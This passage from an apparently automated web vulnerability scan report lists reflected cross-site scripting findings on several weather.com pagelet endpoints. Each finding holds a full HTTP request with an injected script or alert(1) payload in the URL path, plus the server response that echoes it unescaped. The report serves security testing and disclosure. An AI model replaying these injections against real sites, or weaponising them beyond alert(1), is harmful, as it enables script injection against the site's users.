Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=; s_pers=%20s_nr%3D1300988115565%7C1303580115565%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.a=1300988116526

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:39:00 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x07
X-Varnish: 1096968725
Date: Thu, 24 Mar 2011 17:38:30 GMT
Connection: keep-alive
Content-Length: 159965

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pageletd0323"><script>alert(1)</script>8da94951a16/bc/59233" />
...[SNIP]...

1.9. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/59233

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe598"-alert(1)-"87ff45b15a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageletfe598"-alert(1)-"87ff45b15a9/bc/59233? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/services/desktop.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=; s_pers=%20s_nr%3D1300988115565%7C1303580115565%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.a=1300988116526

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:39:05 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x01
X-Varnish: 624658701
Date: Thu, 24 Mar 2011 17:38:35 GMT
Connection: keep-alive
Content-Length: 159858

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tch(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pageletfe598"-alert(1)-"87ff45b15a9/bc/59233",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011"
...[SNIP]...

1.10. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/59233

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15553"-alert(1)-"15f2e7eef1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet/bc15553"-alert(1)-"15f2e7eef1b/59233? HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/services/desktop.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=; s_pers=%20s_nr%3D1300988115565%7C1303580115565%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.a=1300988116526

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:43:40 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x05
X-Varnish: 1096972002
Date: Thu, 24 Mar 2011 17:38:40 GMT
Connection: keep-alive
Content-Length: 108349

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/bc15553"-alert(1)-"15f2e7eef1b/59233",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...

1.11. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/62264

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfc26"-alert(1)-"dee469a1c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageletcfc26"-alert(1)-"dee469a1c86/bc/62264?locid=undefined HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=-1; fromStr=; s_pers=%20s_nr%3D1300988049502%7C1303580049502%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; LocID=; fsr.a=1300988050037

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:36:41 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x04
X-Varnish: 2366485569
Date: Thu, 24 Mar 2011 17:36:11 GMT
Connection: keep-alive
Content-Length: 159897

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tch(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pageletcfc26"-alert(1)-"dee469a1c86/bc/62264",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011"
...[SNIP]...

1.12. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/62264

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de8e4"><script>alert(1)</script>2e617dc8ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageletde8e4"><script>alert(1)</script>2e617dc8ea/bc/62264?locid=undefined HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=-1; fromStr=; s_pers=%20s_nr%3D1300988049502%7C1303580049502%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; LocID=; fsr.a=1300988050037

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:36:36 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x03
X-Varnish: 2366483928
Date: Thu, 24 Mar 2011 17:36:06 GMT
Connection: keep-alive
Content-Length: 159897

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pageletde8e4"><script>alert(1)</script>2e617dc8ea/bc/62264" />
...[SNIP]...

1.13. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/bc/62264

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 248e6"-alert(1)-"b2076ddb63a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet/bc248e6"-alert(1)-"b2076ddb63a/62264?locid=undefined HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=-1; fromStr=; s_pers=%20s_nr%3D1300988049502%7C1303580049502%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; LocID=; fsr.a=1300988050037

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:15 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x05
X-Varnish: 1510843635
Date: Thu, 24 Mar 2011 17:36:15 GMT
Connection: keep-alive
Content-Length: 108373

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/bc248e6"-alert(1)-"b2076ddb63a/62264",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...

1.14. http://www.weather.com/pagelet/loc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/loc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3ae4"-alert(1)-"d7648350a81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelete3ae4"-alert(1)-"d7648350a81/loc/?i=0^noId&rnd=1300988008961 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:36:10 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x03
X-Varnish: 1096914746
Date: Thu, 24 Mar 2011 17:35:40 GMT
Connection: keep-alive
Content-Length: 159842

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tch(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelete3ae4"-alert(1)-"d7648350a81/loc/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...

1.15. http://www.weather.com/pagelet/loc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/loc/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d827"><script>alert(1)</script>20ffba2a649 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet9d827"><script>alert(1)</script>20ffba2a649/loc/?i=0^noId&rnd=1300988008961 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:36:05 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x04
X-Varnish: 1156335400
Date: Thu, 24 Mar 2011 17:35:35 GMT
Connection: keep-alive
Content-Length: 159920

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet9d827"><script>alert(1)</script>20ffba2a649/loc/" />
...[SNIP]...

1.16. http://www.weather.com/pagelet/loc/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/loc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34e99"-alert(1)-"7e7a13b6793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet/loc34e99"-alert(1)-"7e7a13b6793/?i=0^noId&rnd=1300988008961 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:40:46 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x05
X-Varnish: 1096916647
Date: Thu, 24 Mar 2011 17:35:46 GMT
Connection: keep-alive
Content-Length: 108345

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/loc34e99"-alert(1)-"7e7a13b6793/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...

1.17. http://www.weather.com/pagelet/metrics/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/metrics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6673d"><script>alert(1)</script>bb9577b79b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet6673d"><script>alert(1)</script>bb9577b79b5/metrics/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; 